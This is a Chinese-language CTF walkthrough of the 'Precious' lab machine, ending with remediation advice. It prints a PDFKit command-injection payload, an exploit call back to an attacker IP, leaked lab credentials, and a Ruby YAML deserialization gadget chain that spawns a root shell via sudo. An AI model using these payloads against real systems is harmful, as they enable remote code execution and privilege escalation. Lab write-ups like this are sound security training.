[Meachines] [Easy] Precious Ruby-pdfkit-RCE+Ruby YAML反序列化权限提升
字数 817 2025-08-22 12:23:41
Ruby安全漏洞分析与利用:PDFKit RCE与YAML反序列化提权
1. 目标信息收集
1.1 初始扫描
目标IP: 10.10.11.189
开放端口:
- 22/tcp - OpenSSH 8.4p1
- 80/tcp - nginx 1.18.0
$ ip='10.10.11.189'; itf='tun0'
$ if nmap -sn "$ip" | grep -q "Host is up"; then
echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
if [ -n "$ports" ]; then
echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
nmap -Pn -sV -sC -p "$ports" "$ip"
else
echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
fi
else
echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
1.2 Web服务识别
添加主机名到/etc/hosts:
$ echo '10.10.11.189 precious.htb' >> /etc/hosts
使用whatweb识别Web技术:
$ whatweb http://precious.htb/ -v
2. PDFKit远程代码执行漏洞利用
2.1 漏洞识别
发现网站使用PDFKit v0.8.6生成PDF文件:
$ ./exiftool q6whs0fu6nzcp86yervxcasxcxqofm8k.pdf
Generated by pdfkit v0.8.6
PDFKit v0.8.6存在远程代码执行漏洞:
2.2 漏洞利用
构造恶意请求触发RCE:
http%20`ping -c 1 10.10.16.28`
使用自动化脚本利用:
$ python3 kit.py -s 10.10.16.28 443 -w http://precious.htb -p url
2.3 获取初始访问权限
成功利用后获取ruby用户权限:
ruby@precious:~$ grep -iR henry
username:henry
password:Q3c1AqGHtoI0aXAYFH
获取user flag:
5122df0943bba969f407138e7456440a
3. Ruby YAML反序列化提权
3.1 权限检查
检查henry用户的sudo权限:
henry@precious:~$ sudo -l
发现可以以root权限执行/opt/update_dependencies.rb:
require "yaml"
require 'rubygems'
def update_gems()
end
def list_from_file
YAML.load(File.read("dependencies.yml"))
end
def list_local_gems
Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end
gems_file = list_from_file
gems_local = list_local_gems
gems_file.each do |file_name, file_version|
gems_local.each do |local_name, local_version|
if(file_name == local_name)
if(file_version != local_version)
puts "Installed version differs from the one specified in file: " + local_name
else
puts "Installed version is equals to the one specified in file: " + local_name
end
end
end
end
3.2 漏洞分析
关键漏洞点:
- 使用
YAML.load而非YAML.safe_load加载YAML文件 - 可以加载任意Ruby对象导致反序列化漏洞
3.3 构造恶意YAML
创建dependencies.yml文件:
---
!ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets:
!ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: /bin/bash
method_id: :resolve
3.4 执行提权
执行脚本触发漏洞:
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
获取root flag:
822a67160b990d37b78c84fb03256922
4. 漏洞修复建议
4.1 PDFKit RCE修复
- 升级PDFKit到最新版本
- 对用户输入进行严格过滤和验证
- 使用沙箱环境执行PDF生成
4.2 YAML反序列化修复
- 使用
YAML.safe_load替代YAML.load - 限制YAML文件加载的类
- 实现输入验证和沙箱执行环境